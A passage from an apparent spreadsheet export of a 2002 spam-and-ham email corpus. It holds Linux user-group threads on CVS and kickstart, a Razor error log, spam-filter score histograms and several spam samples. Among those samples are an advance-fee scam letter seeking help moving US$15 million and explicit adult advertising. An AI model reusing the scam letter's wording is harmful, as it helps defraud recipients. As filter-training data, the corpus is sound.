 that this doesn't necessarily mean that I was doing it right so below are
 the commands I used.
 ./configure --with-emacs --prefix=/url/url --exec-prefix=/url/url
 followed by the commands make and make install.
 There is no text files which contain help on installing the url package so
 I'm not completely certain if I've used the right method here.
 Thanks again
 Darragh
 ----- Original Message -----
 From: "Hunt, Bryan" &lt;B.Hunt@emuse-tech.com&gt;
 To: &lt;macarthy@iol.ie&gt;; &lt;michael.conry@ucd.ie&gt;
 Cc: &lt;ilug@linux.ie&gt;
 Sent: Thursday, September 05, 2002 5:08 PM
 Subject: OT: RE: [ILUG] Newby to Linux looking for information on cvs
 &gt;
 &gt; speaking of that IDE (weblogic developer) the open source version called
 &gt; eclipse is free from eclipse.org If you are doing java development you
 &gt; need to get this IDE . I've been using it for the last month and it is
 &gt; absolutly superb. Best thing about it is that rather than using swing
 &gt; (which is crap) is that they have their own native widget set called swt.
 &gt;
 &gt; When you run it on windows it uses windows widgets but when you run it on
 &gt; linux it uses gtk, you should see it on gnome 2 ! Absolutely stunning !
 &gt;
 &gt; --B
 &gt;
 &gt; -----Original Message-----
 &gt; From: Justin MacCarthy [mailto:macarthy@iol.ie]
 &gt; Sent: 05 September 2002 16:53
 &gt; To: michael.conry@ucd.ie
 &gt; Cc: ilug@linux.ie
 &gt; Subject: RE: [ILUG] Newby to Linux looking for information on cvs
 &gt;
 &gt;
 &gt; This is the best step by step guide to setting up cvs on Redhat..
 &gt;
 &gt;
 http://www7b.software.ibm.com/wsdd/library/techarticles/0205_yu/yu.html?open
 &gt; &amp;l=456,t=gr
 &gt;
 &gt; It is for a particular IBM ide, but the setup and testing of the server is
 &gt; the same for any CVS client
 &gt;
 &gt; Both The "Using Linux" and "Linux in a nutshell" book by Oreilly have
 &gt; sections on cvs /rcs , and both books are a must buy for any linux newbie
 &gt;
 &gt;
 &gt; Justin
 &gt;
 &gt;
 &gt; &gt; -----Original Message-----
 &gt; &gt; From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of
 &gt; &gt; Michael Conry
 &gt; &gt; Sent: 05 September 2002 16:34
 &gt; &gt; To: Darragh
 &gt; &gt; Cc: ilug@linux.ie
 &gt; &gt; Subject: Re: [ILUG] Newby to Linux looking for information on cvs
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; On 0020 +0100 %{!Thu, Sep 05, 2002 at  3:55:16PM +0100}, Darragh wrote:
 &gt; &gt; &gt; Hello,
 &gt; &gt; &gt; I am very new to Linux and need some help on a utility called
 &gt; &gt; cvs.  As far
 &gt; &gt; &gt; as I'm aware its a similar protocol to FTP.  I need to use it
 &gt; &gt; to download a
 &gt; &gt; &gt; program from :pserver:anoncvs@subversions.gnu.org:/cvsroot/w3.
 &gt; &gt; I am looking
 &gt; &gt; &gt; for information on how to use it.  I'll have another look at
 &gt; &gt; the man pages
 &gt; &gt; &gt; but I think I have to set it up before I can download anything.
 &gt; &gt; cvs is really a very different kind of thing to FTP, but the details of
 &gt; &gt; that statement are left as an exercise to the reader (won't show up my
 &gt; &gt; own ignorance that way ;-)
 &gt; &gt; The application you want is cvsclient...
 &gt; &gt; There is documentation here:
 &gt; &gt; http://www.fokus.gmd.de/gnu/docs/cvs/cvsclient_toc.html
 &gt; &gt;
 &gt; &gt; You might get a quick idea of how it works from here:
 &gt; &gt; http://www.sci.muni.cz/~mikulik/gnuplot.html
 &gt; &gt; where he explains how to get cvs gnuplot...
 &gt; &gt; The commands are:
 &gt; &gt;
 &gt; &gt; export
 &gt; &gt; CVSROOT=:pserver:anonymous@cvs.gnuplot.sourceforge.net:/cvsroot/gnuplot
 &gt; &gt; cvs login
 &gt; &gt; cvs -z3 checkout gnuplot
 &gt; &gt;
 &gt; &gt; Something similar will probably do the job for you.  I'm guessing the
 &gt; &gt; following MIGHT work...
 &gt; &gt;
 &gt; &gt; export CVSROOT=:pserver:anoncvs@subversions.gnu.org:/cvsroot/w3
 &gt; &gt; cvs login
 &gt; &gt; cvs -z3 checkout w3
 &gt; &gt;
 &gt; &gt; m
 &gt; &gt; --
 &gt; &gt; Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
 &gt; &gt; Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C
 &gt; &gt;
 &gt; &gt; --
 &gt; &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 &gt; &gt; information.
 &gt; &gt; List maintainer: listmaster@linux.ie
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt;
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 information.
 &gt; List maintainer: listmaster@linux.ie
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 information.
 &gt; List maintainer: listmaster@linux.ie
 &gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: lOOKING FOR AGENT OF BATHTUB SALING
</t>
  </si>
  <si>
    <t xml:space="preserve">Note:If this eamil is not fit for you,please reply to webmaster@wjjzzs.com with "remove".You'd tell me the email address we've used.
 We don't intend to send spam email to you.Thank you!
 ATTN:fork@xent.com
 Dear sirs or Madams,
 We are one Arcyl bathtub manufacturer in China.
 -----------------Profile-----------------------
 Our factoryspecializes in manufacturing YEMA brand acrylic composite bathtubs, we have more than 10 years experience of bathtub manufacturing and marketing. With 
 our considerable experience we set out to blend the advantages of all the other of bathtubs offered in the market place into one range. After several years 
 development we produced our current range and the YEMA brand bathtub was patented in 2001. We were even awarded the "Gold Medal" in the "Chinese Patent Technology 
 Exhibition" and "The Ninth Chinese New Patent Technology and New Patent Product Exhibition" later that year. The YEMA bathtubs structural design is that of a normal 
 acrylic bathtub but conglutinated into a composite material. It is ridged and is made more than twice as thick as a normal unit, making it more smooth, gentle and 
 elegant. This manufacturing technique not only provides all the advantages of a normal acrylic bathtub (easily to clean, resistance to dirt, colorful,attractive etc) 
 but also provides increased heat retention, and extends the products life span.
 Besides our products on website, we now produce some new models for USA market. We also produce shower panels with finest quality.
 -------------------bathtub Specifications---------------------
 1,Wall thickness:10mm~20mm
 2,Weight: 50~60KG
 -------------------Cooperate--------------------------------
 We would like to be your OEM/ODM manufacturer.
 For detailed info, please browse our website http://www.wjjzzs.com
 Best wishes and regards,
 Export Manager
 Jerry Lee
 Mobile:13951228561
 Phone:0086-519-5211973
 Fax:  0086-519-5209776
 Wujin Huangli Composited Sanitary Factory
 Add:HUangli town,Wujin county
     Changzhou 213151
     Jiangsu province
     P.R.China
 Websie:http://www.wjjzzs.com
 Email:wjjzzs@wjjzzs.com
 July 18, 2002
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: URGENT ASSISTANCE(CONFIDENTIAL)
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear sir,,
 My name is DR Steven M Duba , the son of MR. Theo
 Duba of Zimbabwe. I got your address from South
 African Information exchange Johannesburg.
 .
 Due to the previous war against white farmers in
 Zimbabwe by PRESIDENT ROBERT MUGABE and his supporters
 to claim all the white owned farms in our country, he
 ordered all the White owned farmers to surrender all
 their farms to his party members and his followers. My
 father was a victim of this oppression and inhuman
 behavior as he was one of the richest farmers in our
 country,my fayher was totaly against the act by the
 presidnt MUGABE. The presidents supporters invaded my
 fathers farm, burnt everything in the farm, arrested
 him and confiscated all his investment.
 Early last year when this victimization of white
 farmers by president Mugabe started, my late father
 envisaged a worse situation, he arranged almost all
 his money concealed it in a box and smuggled it out of
 Zimbabwe through Diplomatic means to South Africa.
 When he arrived South Africa, he lodged the box in a
 private security company through the help of his
 lawyer here in South Africa without revealing the real
 contents of the box to the security company, then,
 went back home. He registered the box as family
 treasure.
 While he was still in detention that led to his death
 due to torture, he directed me to his lawyer in South
 Africa because of the escalation of the crisis in
 Zimbabwe. He did not want my life to be in danger. He
 was arrested on the 5th of March last year.
 Unfortunately my dear father died on the 10th of
 December 2001.I came to south Africa March,2002.
 Now my stay here in Africa is frustrating and
 depressing because my fathers lawyer is presently
 hospitalized in London due to terrible heart problem;
 though the lodgment documents are with me, as such I
 want to relocate to your country for good. Presently,
 my residence permit here in South Africa is an Asylum
 permit as a refugee.
 I am seeking for your assistance in transferring the
 money in the security company (US$15 Million) out of
 this country to your country for investment. If you
 think you can help me, Please try to get in touch with
 me immediately with the  number below . Your
 compensation/share for assistance will be negotiated
 if you are ready to assist me. Since the problem in my
 country is still lingering, please endeavor to keep
 this information to yourself and secret, because I
 wouldnt want anything that will expose me, and the
 existence of this money.
 Your urgent response will be highly appreciated.
 Sincerely yours,
 STEVEN DUBA (DR).
 TEL:27-83-713-2696
 __________________________________________________
 Do You Yahoo!?
 Yahoo! Finance - Get real-time stock quotes
 http://finance.yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Razor Server Error
</t>
  </si>
  <si>
    <t xml:space="preserve">Can anyone offer some insight into the following error?  I am able to pipe mail 
 through razor-check as root and it works fine but when it goes through the user 
 filter via postfix I get the errors below.  What's strange is that this just 
 started, I've made no changes, and it was running beautifully for days.
 The goods:
 Jul 22 10:59:39.878996 check[29891]: [ 1] [bootup] Logging initiated 
 LogDebugLevel=3 to file:razor-agent.log
 Jul 22 10:59:39.880196 check[29891]: [ 2]  Razor-Agents v2.12 starting razor-
 check
 Jul 22 10:59:41.929484 check[29891]: [ 3] Unable to connect to ARRAY
 (0x80ff3c8):2703; Reason: Invalid argument.
 Jul 22 10:59:41.934032 check[29891]: [ 1] vr4_signature: Bad ep4:
 Jul 22 10:59:41.935634 check[29891]: [ 3] Unable to connect to ARRAY
 (0x80ff3c8):2703; Reason: Invalid argument.
 Jul 22 10:59:41.936022 check[29891]: [ 1] razor-check error: checkit: connect1: 
 nextserver: No Razor servers available at this time
 TIA!
 ~S~
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Worryingly sophisticated bees
</t>
  </si>
  <si>
    <t xml:space="preserve">Ananova: 
 Brazilian bees keep their own 'insect ranch'
 Scientists have found a new species of bee that behaves like a farmer by
 keeping herds of insects.
 The Amazonian Schwarzula use their own 'insect ranches' to provide food and
 building materials.
 The bees nest in holes in trees alongside 200 aphid-like insects from a
 species called cryptostigma.
 Cryptostigma feed on tree sap and excrete a sugar solution, which the bees
 stop them from drowning in, by licking it up and turning it into honey.
 The insects also produce wax from glands on their backs, which the bees
 scrape off and use for their nest.
 Nature reports it is the first time farming behaviour has been discovered in
 bees.
 Biologist Joao Camargo, of the University of Sao Paulo in Brazil, said: "In
 turn the bees provide the insects with sanitary benefits and protection."
 Writing in the journal Biotropica, Camargo says the bees might even carry
 their insect ranches around the forest with them and is planning further
 research on how they tend to their herd.
 Studies of the Schwarzula showed the bees seemed to get most of their sugar
 from the insect farms. Some bees were seen licking human sweat for salt.
 Story filed: 13:49 Wednesday 28th August 2002
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Super Blue Stuff Pain Relief - On Sale Today for $29.95 + shipping!
 With Super Blue Stuff youll feel the results in just minutes.
 Relieves arthritis pain, back pain, sore muscles, and more!
 http://us.click.yahoo.com/N2sPyA/q6kEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] redhat kickstart
</t>
  </si>
  <si>
    <t xml:space="preserve">How many Redhat admins out there use the redhat kickstart?
 If you don't use it, how do you install redhat on all your 
 workstations, do you do it by hand, with the cds?
 As we are looking at using Linux at work, I'm looking
 into setting up the kickstart. There doesn't seem to
 be a lot of documentation around about it.
 Does anybody know if it would be possible to do the following:
 Get the machine to boot using DHCP and read it's kickstart
 config file from teh DHCP server and in this config file
 have the machine configured to use a static IP, so that when
 the machine is rebooted it will come up with it's new IP.
 Also, There was no driver on the redhat network install flopopy
 for the network card in the machine I'm installing. This required
 me to uncompress the floppy image, loop mount it, add in the module
 for the network card and compress it all up again. I'm not going
 to be able to do this every time we get a new machine, I was
 wondering if instead of having a boot floppy, you could use a boot
 cdrom, but just for the purpose of having all the network card
 modules on the cdrom. I'd still want it to get the packages from
 an NFS server on the network.
 Any help with this would be greatly appreciated,
 cheers,
 deccy.
 -- 
 ---------------------------------------
 Declan Houlihan
 deccy@csn.ul.ie
 http://deccy.csn.ul.ie/
 ---------------------------------------
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">We've not only reduced the f-p and f-n rates in my test runs, we've also
 made the score distributions substantially sharper.  This is bad news for
 Greg, because the non-existent "middle ground" is becoming even less
 existent &lt;wink&gt;:
 Ham distribution for all runs:
 * = 1333 items
   0.00 79975 ************************************************************
   2.50     1 *
   5.00     0
   7.50     0
  10.00     2 *
  12.50     1 *
  15.00     0
  17.50     0
  20.00     0
  22.50     1 *
  25.00     0
  27.50     0
  30.00     0
  32.50     0
  35.00     0
  37.50     1 *
  40.00     0
  42.50     0
  45.00     0
  47.50     0
  50.00     0
  52.50     0
  55.00     0
  57.50     0
  60.00     1 *
  62.50     0
  65.00     1 *
  67.50     0
  70.00     0
  72.50     0
  75.00     0
  77.50     0
  80.00     0
  82.50     0
  85.00     0
  87.50     0
  90.00     0
  92.50     0
  95.00     0
  97.50    17 *
 Spam distribution for all runs:
 * = 914 items
   0.00   118 *
   2.50     7 *
   5.00     0
   7.50     2 *
  10.00     1 *
  12.50     1 *
  15.00     3 *
  17.50     1 *
  20.00     1 *
  22.50     1 *
  25.00     0
  27.50     0
  30.00     4 *
  32.50     3 *
  35.00     4 *
  37.50     2 *
  40.00     0
  42.50     1 *
  45.00     1 *
  47.50     0
  50.00     2 *
  52.50     3 *
  55.00     1 *
  57.50     2 *
  60.00     0
  62.50     1 *
  65.00     1 *
  67.50    10 *
  70.00     2 *
  72.50     1 *
  75.00     2 *
  77.50     1 *
  80.00     0
  82.50     0
  85.00     1 *
  87.50     4 *
  90.00     2 *
  92.50     5 *
  95.00    14 *
  97.50 54806 ************************************************************
 As usual for me, this is an aggregate of 20 runs, each both training and
 predicting on 4000 c.l.py ham + ~2750 BruceG spam.
 Only 25 ham scores out of 80,000 are above 0.025 now (and, yes, the
 "Nigerian scam"-quoting msg is still counted as ham -- I haven't taken
 anything out of the ham corpus since remving the "If AOL were a car" spam),
 the f-p rate wouldn't have changed at all if the spamprob cutoff were
 dropped from 0.90 to 0.675, dropping the cutoff to 0.40 would have added
 only 2 false positives, and dropping it to 0.15 would have added only
 another 2 more!
 It's spooky.
</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:01 PM -0700 on 9/17/02, James Rogers wrote:
 &gt; The Primitive People pull a fast one on Whitey The Junior
 &gt; Anthropologist
 Or Margaret, in the case of a famous proto-feminist...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</si>
  <si>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Kevin Mitnick's laptop, signed by Woz, on eBay
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513208
 Date: Not supplied
 Kevin "Free Kevin" Mitnick and Steve "Woz" Wozniak co-hosted an episode of The 
 Screen Saver on Tech TV, where Woz autographed one of the laptops that Kevin 
 got arrested for using. Now that machine, signed by both net-celebs, is up for 
 sale on eBay. 
     This is the Toshiba Satellite T1960CS, 486 laptop computer seized by the 
     FBI on February 15, 1995, in Raleigh, NC, during the arrest of the world's 
     most celebrated computer hacker, Kevin Mitnick. The laptop is working and 
     has been loaded with a fresh version of Windows 95. A shrink-wrapped 
     version of Windows 95 on floppy, is included with the laptop. The laptop is 
     a 486DX with a color LCD, detachable trackball mouse, AT&amp;T 14.4 PCMCIA 
     modem card, power adapter and documentation in FBI evidence bags. The 
     laptop has been signed on the bottom by Steve Wozniak, co-founder of Apple 
     Computer, and says, "You've got the whole world in your hands. --Woz (Free 
     Kevin!). It is also signed by Mitnick himself. The system was shown on the 
     September 27, 2002 episode of The Screen Savers on TechTV, where the 
     signatures on the bottom were authenticated in a special show hosted by 
     Wozniak and Mitnick. A tape of the show will also be included.  
 Link[1] Discuss[2] (_Thanks, Jimbo!_)
 [1] http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&amp;item=2057697313
 [2] http://www.quicktopic.com/boing/H/NqDajD2X9Di
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Another low probability event
</t>
  </si>
  <si>
    <t xml:space="preserve">We met a family in our parent-baby group with a son born a few minutes
 before our daughter - not unlikely as all members were from the same
 hospital. But, this family happened to have lived in the exact same
 apartment unit a year before we had...
 ----- Original Message -----
 From: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;
 To: "FoRK" &lt;FoRK@xent.com&gt;
 Sent: Wednesday, August 28, 2002 10:40 AM
 Subject: Another low probability event
 &gt; So, a new family moved in down the street, with two kids, making us very
 &gt; excited that there might be a child around the same age (20 months) as our
 &gt; daughter Tatum. While we're talking to the family, we discover that their
 &gt; daughter Kiara was born the same day as Tatum, within two hours, in the
 same
 &gt; exact maternity ward. Both mothers were undoubtedly in labor at the same
 &gt; time.
 &gt;
 &gt; Wow.
 &gt;
 &gt; - Jim
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sunday 01 September 2002 08:43 pm, Reza B'Far (eBuilt) wrote:
 &gt; 3.  Java is not just a programming language!
 The astounding thing about java is that despite all of the many significant 
 points in its favor, it still manages to suck, and break across JVMs.
 I was really looking forward to being able to use a better language like 
 java and get it compiled to real platform-specific binaries via the GNU 
 compiler collection.   But this seems to have never really gotten anywhere 
 because it would require porting or reimplementing libraries, which are 
 probably not source-available or tolerably licenced.   When I looked at 
 what I had to do to gcc and link "hello world," I lost interest.
 Who the hell is writing the runtimes, anyway?   Why are Perl/Python/Ruby 
 more reliable?   In a world where the Macs all ran emulated 68K code 
 utterly reliably, it's just hard to accept that there can't be a single 
 portable JVM that just works.
 My opinion is biased because of the disgraceful state of non-Windoze 
 browser java implementations.
 Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A revolution in the PC world has arrived.          RSIRTR
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New light on a lost world of shattered icons
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622122,215/
 Date: 2002-10-07T03:52:54+01:00
 *Arts:* Medieval religious images salvaged from the destruction wrought during 
 the reign of Henry VIII reign and the civil war go on show in Leeds.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I'm ready to bare for you!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;TABLE borderColorDark=#0000cc width=700 align=center bgColor=#ffffff 
 borderColorLight=#000000 border=2&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;DIV align=center&gt;
 &lt;H3&gt;&lt;B&gt;Hot Tawnee the Internet Sensation is ready to bare all for 
 you.&lt;/B&gt;&lt;BR&gt;&lt;B&gt;Looking at those &lt;FONT color=#0000ff&gt;firm tits and creamy soft 
 thighs&lt;/FONT&gt; you can't help but get an instant erection. Now Tawnee's Sister 
 Tori joined in. Both are sweet little honeys that love to show you what a good 
 time is all about!&lt;/B&gt;&lt;BR&gt;
           &lt;B&gt;Click here To Visit &lt;FONT size=2&gt;&lt;A href="http://lightspeed.d2g.com"&gt;&lt;font size="5" color="#FF0000"&gt;TawneeStone.com&lt;/font&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;FONT color=#000000&gt; 
           where you will see both posing for you in many erotic ways&lt;/FONT&gt;&lt;/B&gt; 
         &lt;/H3&gt;
       &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 	  &lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;TABLE borderColorDark=#0000cc width=700 align=center bgColor=#ffffff 
 borderColorLight=#000000 border=2&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
     &lt;TD&gt;
       &lt;div align="center"&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif"&gt;THIS 
         EMAIL WAS NOT SENT UNSOLICITED. YOU HAVE SUBSCRIBED TO RECEIVE OUR MAILING. 
         IF YOU WISH TO DISCONTINUE SIMPLY REPLY TO THIS EMAIL WITH &amp;quot;REMOVE&amp;quot; 
         IN SUBJECT. WE ARE SORRY FOR ANY INCONVENIENCE. &lt;/font&gt; &lt;/div&gt;
       &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Keep it under wraps, but this one works a treat!                   7595
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;HEAD&gt; 
 &lt;TITLE&gt;creditfix&lt;/TITLE&gt;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OUND=3Dhttp://365.sunshinehui.com/creditfix/email/background_arrow.gif WID=
 TH=3D400&gt; 
 &lt;TR&gt; 
 &lt;TD&gt;&lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1580&amp;mid=3D17600=
 &gt;&lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/banner_email.gif BO=
 RDER=3D0&gt;&lt;/A&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt; 
 &lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1580&amp;mid=3D17600&gt;&lt;im=
 g src=3Dhttp://365.sunshinehui.com/creditfix/email/body_email.gif alt=3D""=
  border=3D"0"&gt;&lt;/A&gt; 
 &lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/thankyou.gif&gt; 
 &lt;BR&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1580-17600.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please 
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your 
 name into the remove box. If you have previously 
 unsubscribed and are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, 
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt; 
 &lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/CENTER&gt; 
 &lt;BR&gt; 
 &lt;/BODY&gt; 
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Hi! I'm new here.
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_FC527_01C23FE0.9AFE81B0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 We attempted to deliver this message to you with HTML formatting. =
 However, your e-mail program does not support HTML-enhanced messages. =
 Please go to your E-mail Settings for this group and change your E-mail =
 Preference to "Text only".
 http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw
 MSN Groups
 ------=_NextPart_000_FC527_01C23FE0.9AFE81B0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
   &lt;HTML&gt;
 &lt;HEAD&gt;
   &lt;META http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgcolor=3D#FFFFFF leftmargin=3D"0" rightmargin=3D"0" =
 bottommargin=3D"0" topmargin=3D"0"&gt;&lt;BASEFONT face=3D"Arial, Helvetica, =
 Sans Serif" size=3D2&gt;
 &lt;STYLE type=3Dtext/css&gt;
 /* Foreground colors */
 .ThmFgColumnHeader, A.FrameLink, A.HeaderLink, A.FooterLink, A.LgtCmd, =
 A.MSNLink {color:#FFFFFF;}
 .ThmFgTitleLightBk {color:#FF6600;}
 .ThmFgNavLink, A.NavLink, A.ChildLink:hover {color:#666699;}
 .ThmFgInactiveText, A.SystemLink {color: #666666;}
 .ThmFgFrameTitle {color: #FFFFCC;}
 .ThmFgTitleDarkBk, A.NavLink:hover, A.TitleLink {color: #CC6600;}
 .ThmFgMiscText, A.Cat, A.SubCat {color: #336699;}
 .ThmFgCommand, A.Command, A.LargeCommand, A.MsgLink {color: #003366;}
 .ThmFgHeader {color: #333333;}
 .ThmFgStandard, A.SystemLink:hover, A.SubLink, A.ChildLink, A.StdLink, =
 SELECT.Standard {color: #000000;}
 .ThmFgDivider {color: #CCCCCC;} /* primarily for HR tags */
 /* Background colors */
 .ThmBgStandard {background-color: #FFFFFF;}
 .ThmBgUnknown1 {background-color: #FF6600;}
 .ThmBgFraming {background-color: #666699;}
 .ThmBgUnknown2 {background-color: #666666;}
 .ThmBgHighlightDark {background-color: #FFFFCC;}
 .ThmBgHighlightLight, #idToolbar {background-color: #FFFFE8;}
 .ThmBgTitleDarkBk {background-color: #F1F1F1;}
 .ThmBgAlternate {background-color: #ECF1F6;}
 .ThmBgUnknown3 {background-color: #CCCCFF;}
 .ThmBgDivider {background-color: #CCCCCC;}
 .ThmBgHeader {background-color: #9999CC;}
 .ThmBgLinks {background-color: #8696C9;}
 .ThmBgSharkBar {background-color: #8696C9;}
 &lt;/STYLE&gt;
 &lt;IMG border=3D0 width=3D1 height=3D1 =
 src=3D"http://c.msn.com/c.gif?NC=3D9523&amp;NA=3D34131&amp;PS=3D&amp;PI=3D26283&amp;DI=3D=
 416&amp;TP=3Dhttp://groups.msn.com"&gt;&lt;TABLE border=3D0 cellpadding=3D0 =
 cellspacing=3D0 width=3D"100%" class=3DThmBgAlternate&gt;
   &lt;TR valign=3D"middle"&gt;
     &lt;TD&gt;&lt;IMG align=3D"middle" border=3D"0" =
 src=3D"http://sc.communities.msn.com/themes/pby/img/mail/mlstar.gif"&gt;&lt;/TD=
 &gt;
     &lt;TD width=3D100%&gt;&lt;FONT face=3DArial, Helvetica, Sans Serif =
 class=3DThmFgTitleLightBk size=3D"4"&gt;New Message on &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving"&gt;One Income =
 Living&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD colspan=3D2 width=3D"100%" height=3D"1" =
 colspan=3D"2"&gt;&lt;IMG border=3D"0" =
 src=3D"http://sc.communities.msn.com/img/c.gif" width=3D"100%" =
 height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
       &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Dshowdiscussion&amp;parent=3D1&amp;item=3D1396"&gt;&lt;B&gt;&lt;FONT =
 face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgTitleLightBk =
 size=3D"2"&gt;Hi! I&amp;#39;m new here.&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
     &lt;BR&gt;=09
     &lt;TABLE class=3DThmBgAlternate border=3D1 cellspacing=3D0 =
 cellpadding=3D2&gt;
       &lt;TR class=3DThmBgAlternate&gt;&lt;TD align=3Dcenter =
 background=3D"http://sc.communities.msn.com/themes/pby/img/mb/reply_bg.gi=
 f" nowrap&gt;&lt;A =
 href=3D"mailto:OneIncomeLiving@groups.msn.com?subject=3DRe%3A%20Hi%21%20I=
 %27m%20new%20here%2E" title=3D"Send a reply to this message."&gt;&lt;FONT =
 face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Reply&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG border=3D0 width=3D80 =
 height=3D1 src=3D"http://sc.communities.msn.com/img/c.gif"&gt;&lt;/TD&gt;&lt;TD =
 width=3D100%&gt;
           &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0&gt;
             &lt;TR&gt;
